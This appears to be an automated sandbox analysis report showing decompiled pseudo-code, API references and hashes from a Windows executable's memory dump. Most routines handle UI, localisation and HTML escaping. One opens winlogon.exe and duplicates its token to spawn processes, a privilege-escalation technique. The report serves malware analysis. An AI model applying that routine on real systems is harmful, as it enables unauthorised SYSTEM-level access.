                                                                                                                                                                                                                          					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                                                          					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                                                                                                                                                                          					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                                                                                                                                                                          					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                                                                                                                                                                          					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t3;
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004063B2
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004063C2
                                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                                                                                                                            • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                          • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                                                                                                                          • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 16%
                                                                                                                                                                                                                          			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                                                                                                                                                                          				void* _t2;
                                                                                                                                                                                                                          				signed short* _t3;
                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t3 = __eax;
                                                                                                                                                                                                                          				_t8 = __ecx;
                                                                                                                                                                                                                          				_t7 = 8;
                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                          					_t2 =  *_t3 & 0x0000ffff;
                                                                                                                                                                                                                          					if(_t2 != 0x3c) {
                                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_push(_t7);
                                                                                                                                                                                                                          					_push(L"&lt;");
                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                          					_t2 = memcpy(_t8, ??, ??);
                                                                                                                                                                                                                          					_t10 = _t10 + 0xc;
                                                                                                                                                                                                                          					_t8 = _t8 + _t7;
                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                          					if( *_t3 != 0) {
                                                                                                                                                                                                                          						_t3 =  &(_t3[1]);
                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return _t2;
                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                          					if(_t2 != 0x3e) {
                                                                                                                                                                                                                          						if(_t2 != 0x22) {
                                                                                                                                                                                                                          							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                                                                                                                                                          								if(_t2 != 0x26) {
                                                                                                                                                                                                                          									if(_t2 != 0xa) {
                                                                                                                                                                                                                          										 *_t8 = _t2;
                                                                                                                                                                                                                          										_t8 = _t8 + 2;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										_push(_t7);
                                                                                                                                                                                                                          										_push(L"<br>");
                                                                                                                                                                                                                          										goto L14;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_push(0xa);
                                                                                                                                                                                                                          									_push(L"&amp;");
                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_push(0xa);
                                                                                                                                                                                                                          								_push(L"&deg;");
                                                                                                                                                                                                                          								L11:
                                                                                                                                                                                                                          								_t2 = memcpy(_t8, ??, ??);
                                                                                                                                                                                                                          								_t10 = _t10 + 0xc;
                                                                                                                                                                                                                          								_t8 = _t8 + 0xa;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                                                                                                                                                          							_t10 = _t10 + 0xc;
                                                                                                                                                                                                                          							_t8 = _t8 + 0xc;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_push(_t7);
                                                                                                                                                                                                                          						_push(L"&gt;");
                                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                          0x0040ae30
                                                                                                                                                                                                                          0x0040ae12
                                                                                                                                                                                                                          0x0040ae12
                                                                                                                                                                                                                          0x0040ae13
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae13
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ae10

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                          • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                                                                                                                          • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                          				struct HDWP__* _v8;
                                                                                                                                                                                                                          				intOrPtr* _v12;
                                                                                                                                                                                                                          				void _v534;
                                                                                                                                                                                                                          				short _v536;
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                                          				intOrPtr* _t95;
                                                                                                                                                                                                                          				RECT* _t96;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t95 = __ecx;
                                                                                                                                                                                                                          				_v12 = __ecx;
                                                                                                                                                                                                                          				if(_a4 == 0x233) {
                                                                                                                                                                                                                          					_v536 = 0;
                                                                                                                                                                                                                          					memset( &_v534, 0, 0x208);
                                                                                                                                                                                                                          					DragQueryFileW(_a8, 0,  &_v536, 0x104);
                                                                                                                                                                                                                          					DragFinish(_a8);
                                                                                                                                                                                                                          					 *((intOrPtr*)( *_t95 + 4))(0);
                                                                                                                                                                                                                          					E00404923(0x104, _t95 + 0x1680,  &_v536);
                                                                                                                                                                                                                          					 *((intOrPtr*)( *_v12 + 4))(1);
                                                                                                                                                                                                                          					_t95 = _v12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_a4 != 5) {
                                                                                                                                                                                                                          					if(_a4 != 0xf) {
                                                                                                                                                                                                                          						if(_a4 == 0x24) {
                                                                                                                                                                                                                          							_t42 = _a12;
                                                                                                                                                                                                                          							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
                                                                                                                                                                                                                          							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						E00402EC8(_t95 + 0x40);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_v8 = BeginDeferWindowPos(0xd);
                                                                                                                                                                                                                          					_t96 = _t95 + 0x40;
                                                                                                                                                                                                                          					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
                                                                                                                                                                                                                          					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
                                                                                                                                                                                                                          					EndDeferWindowPos(_v8);
                                                                                                                                                                                                                          					InvalidateRect( *(_t96 + 0x10), _t96, 1);
                                                                                                                                                                                                                          					_t95 = _v12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00402CED(_t95, _a4, _a8, _a12);
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040421E
                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                                                                                                                          • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                                                                                                                            • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 2142561256-3993045852
                                                                                                                                                                                                                          • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                                                                                                                          • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 55%
                                                                                                                                                                                                                          			E00405B81(signed short __ebx) {
                                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t25;
                                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                                          				signed short _t39;
                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                          				int _t61;
                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                          				int _t71;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t39 = __ebx;
                                                                                                                                                                                                                          				if( *0x41c470 == 0) {
                                                                                                                                                                                                                          					E00405ADF();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t40 =  *0x41c468;
                                                                                                                                                                                                                          				_t21 = 0;
                                                                                                                                                                                                                          				if(_t40 <= 0) {
                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                          					_t57 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
                                                                                                                                                                                                                          						_t21 = _t21 + 1;
                                                                                                                                                                                                                          						if(_t21 < _t40) {
                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L6:
                                                                                                                                                                                                                          				if(_t57 != 0) {
                                                                                                                                                                                                                          					L21:
                                                                                                                                                                                                                          					_t22 = _t57;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					if((_t39 & 0x00010000) == 0) {
                                                                                                                                                                                                                          						if( *0x40fb90 == 0) {
                                                                                                                                                                                                                          							_push( *0x41c478 - 1);
                                                                                                                                                                                                                          							_push( *0x41c45c);
                                                                                                                                                                                                                          							_push(_t39);
                                                                                                                                                                                                                          							_t25 = E00405CE7();
                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							wcscpy(0x40fda0, L"strings");
                                                                                                                                                                                                                          							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                                                                                                                                                                          							_t62 = _t62 + 0x10;
                                                                                                                                                                                                                          							if(_t35 == 0) {
                                                                                                                                                                                                                          								L13:
                                                                                                                                                                                                                          								_t25 = GetModuleHandleW(0);
                                                                                                                                                                                                                          								_push( *0x41c478 - 1);
                                                                                                                                                                                                                          								_push( *0x41c45c);
                                                                                                                                                                                                                          								_push(_t39);
                                                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_t61 = wcslen( *0x41c45c);
                                                                                                                                                                                                                          								if(_t61 == 0) {
                                                                                                                                                                                                                          									goto L13;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t25 = GetModuleHandleW(_t57);
                                                                                                                                                                                                                          						_push( *0x41c478 - 1);
                                                                                                                                                                                                                          						_push( *0x41c45c);
                                                                                                                                                                                                                          						_push(_t39 & 0x0000ffff);
                                                                                                                                                                                                                          						L15:
                                                                                                                                                                                                                          						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                                                                                                                                                          						_t71 = _t61;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if(_t71 <= 0) {
                                                                                                                                                                                                                          						L20:
                                                                                                                                                                                                                          						_t22 = 0x40c4e8;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t27 =  *0x41c46c;
                                                                                                                                                                                                                          						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t57 =  *0x41c458 + _t27 * 2;
                                                                                                                                                                                                                          							_t14 = _t61 + 2; // 0x2
                                                                                                                                                                                                                          							memcpy(_t57,  *0x41c45c, _t61 + _t14);
                                                                                                                                                                                                                          							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                                                                                                                                                                          							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                                                                                                                                                                          							 *0x41c468 =  *0x41c468 + 1;
                                                                                                                                                                                                                          							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                                                                                                                                                                          							if(_t57 != 0) {
                                                                                                                                                                                                                          								goto L21;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t22;
                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                                                                                                                            • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                          • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                                                                                                                          • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                          				intOrPtr* _t22;
                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                          				intOrPtr* _t39;
                                                                                                                                                                                                                          				intOrPtr* _t40;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                                                                                                                                                                          				_v12 = _t18;
                                                                                                                                                                                                                          				if(_t18 == 0) {
                                                                                                                                                                                                                          					_t37 = GetLastError();
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t39 = _a4 + 0x800;
                                                                                                                                                                                                                          					_a8 = 0;
                                                                                                                                                                                                                          					E0040289F(_t39);
                                                                                                                                                                                                                          					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                                                                                                                                                                          					if(_t22 == 0) {
                                                                                                                                                                                                                          						_t23 = 0;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if(_t23 == 0) {
                                                                                                                                                                                                                          						_t37 = GetLastError();
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_a4 = _a8;
                                                                                                                                                                                                                          						E0040289F(_t39);
                                                                                                                                                                                                                          						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                                                                                                                                                                          						if(_t40 == 0) {
                                                                                                                                                                                                                          							_t28 = 0;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						if(_t28 == 0) {
                                                                                                                                                                                                                          							_t37 = GetLastError();
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							 *_a12 = _v8;
                                                                                                                                                                                                                          							_t37 = 0;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						CloseHandle(_a8);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					CloseHandle(_v12);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t37;
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                                                                                                                            • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                                                                                                                          • String ID: winlogon.exe
                                                                                                                                                                                                                          • API String ID: 1315556178-961692650
                                                                                                                                                                                                                          • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                                                                          • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                          			E00405236(short* __ebx, intOrPtr _a4) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                          				void _v2058;
                                                                                                                                                                                                                          				void _v2060;
                                                                                                                                                                                                                          				int _t35;
                                                                                                                                                                                                                          				int _t41;
                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                                          				signed short* _t50;
                                                                                                                                                                                                                          				void** _t52;
                                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t48 = 0;
                                                                                                                                                                                                                          				_v2060 = 0;
                                                                                                                                                                                                                          				memset( &_v2058, 0, 0x7fe);
                                                                                                                                                                                                                          				_t54 = _t53 + 0xc;
                                                                                                                                                                                                                          				 *__ebx = 0;
                                                                                                                                                                                                                          				_t52 = _a4 + 4;
                                                                                                                                                                                                                          				_v12 = 2;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_push( *_t52);
                                                                                                                                                                                                                          					_t6 = _t52 - 4; // 0xe80040cb
                                                                                                                                                                                                                          					_push( *_t6);
                                                                                                                                                                                                                          					_push(L"%s (%s)");
                                                                                                                                                                                                                          					_push(0x400);
                                                                                                                                                                                                                          					_push( &_v2060);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t35 = wcslen( &_v2060);
                                                                                                                                                                                                                          					_v8 = _t35;
                                                                                                                                                                                                                          					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
